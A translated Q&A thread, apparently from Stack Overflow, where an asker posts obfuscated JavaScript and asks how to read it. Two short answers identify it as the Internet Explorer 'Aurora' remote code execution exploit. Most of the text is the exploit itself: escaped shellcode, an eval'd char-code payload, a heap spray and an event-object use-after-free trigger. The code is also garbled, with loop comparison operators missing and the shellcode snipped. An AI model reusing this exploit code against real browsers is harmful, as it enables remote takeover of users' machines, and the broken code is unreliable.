如何让这个字符串可读?

时间:2010-01-18 09:04:12

标签: javascript

如何才能获得以下字符串?

var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2       %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053

     [ .. snip .. ]

%ubcb9%ub2f6%ubfa8%u00d8");

所有代码:

var sc = unescape("
  %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
  %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
  %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
  [ .. snip .. ]
  %ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
  %uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
  %ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
  238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
  728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
  350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
  805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
  322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
  224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
  735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
  735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i  sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); 
}
var cc=arr.toString();cc=cc.replace(/ ,/ g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i  200; i ++ ){
  x1[i] = document.createElement("COMMENT");
  x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
  e1 = document.createEventObject(evt);
  document.getElementById("sp1").innerHTML = "";
  window.setInterval(ev2, 50);
}
function ev2(){
  p = "
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
    \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i  x1.length; i ++ ){
    x1[i].data = p;
  }
  ;
  var t = e1.srcElement;
}

2 个答案:

答案 0 :(得分:4)

你不能;它不应该被阅读。你可以告诉,因为代码遍布地图。很可能它是浏览器缓冲区溢出漏洞的一部分。

答案 1 :(得分:1)

它说Internet Explorer远程代码执行利用:

http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/